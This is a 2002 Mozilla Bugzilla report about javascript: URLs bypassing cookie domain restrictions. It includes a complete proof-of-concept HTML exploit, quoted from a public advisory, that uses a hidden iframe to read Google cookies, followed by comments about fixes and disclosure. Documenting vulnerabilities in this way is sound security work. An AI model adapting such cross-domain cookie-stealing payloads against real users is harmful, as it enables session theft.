Closed Bug 159152 Opened 23 years ago Closed 23 years ago

Javascript can steal cookies from other domains

Categories

(Core :: Security, defect)

Product:
Core
Component:
Security
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
VERIFIED DUPLICATE of bug 152725

People

(Reporter: jwbaker, Assigned: security-bugs)

Details

Seen on bugtraq -- "Mozilla cookie stealing - Sandblad advisory #9" -- but not found yet on Bugzilla, so here goes: DESCRIPTION: ============ Mozilla allows script in the javascript protocoll to set and read cookies. For javascript URLs the host and path for the cookie is pulled out as: "javascript:[host][path]" Cookie security is based only on restricting access to correct matching host and path. By carefully crafting a mallicious javascript URL opened in a new frame/iframe/window, it is possible to access and alter cookies from other domains. DETAILS: ======== The easiest way to exploit the vulnerability is to simply create a javascript URL in a javascript function as: javascript://[host]/[path]\n[code to read cookie] The // will make sure host and path don't generate any javascript errors. EXPLOIT: ======== Instructions: Put the exploit in a html document on a remote server and load it with your Mozilla browser to activate the exploit. -------------------------- CUT HERE ---------------------------- <pre> Title: Mozilla cookie stealing/spoofing Date: [2002-07-24] Impact: Steal/spoof arbitrary cookie _ _ using javascript: URLs o' \,=./ `o Author: Andreas Sandblad, sandblad@acc.umu.se (o o) ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--- This demo will display your google cookie (must exist). </pre> <body onload=init()> <iframe name=f height=0 width=0 style=visibility:hidden></iframe> <script> function init(){ f.location = "javascript://www.google.com/\n"+ "'<body onload=alert(document.cookie)>'"; } </script> -------------------------- CUT HERE ----------------------------
Exploit verified using Mozilla/5.0 Galeon/1.2.5 (X11; Linux i686; U;) Gecko/20020610 Debian/1.2.5-1
I think the javascript code should run under the security domain of wherever it came from, right? That is javascript code from www.google.com should run under www.google.com for security purposes, not javascript:whatever().
If you read the full advisory: http://online.securityfocus.com/archive/1/284012/2002-07-21/2002-07-27/0 it states that mozilla 1.1b has this problem fixed. As a security bug you can't search for it so no wonder that it didn't came up in a query, although you can bet that there is one.
That's great but fix should be in 1.0 branch as well.
I bet the fix will be also in 1.0.1 if we release it...
duplicate of bug 152725, but if I close this one we'll just collect more until that one's opened up.
I have to ask... since there is a public announcement on bugtraq with an exploit and since this has been reported on securityfocus, what's the point of keeping the bug closed?
Whiteboard: FIXED BY BUG 152725
*** This bug has been marked as a duplicate of 152725 ***
Status: NEW → RESOLVED
Closed: 23 years ago
Resolution: --- → DUPLICATE
Whiteboard: FIXED BY BUG 152725
Verified
Status: RESOLVED → VERIFIED
You need to log in before you can comment on or make changes to this bug.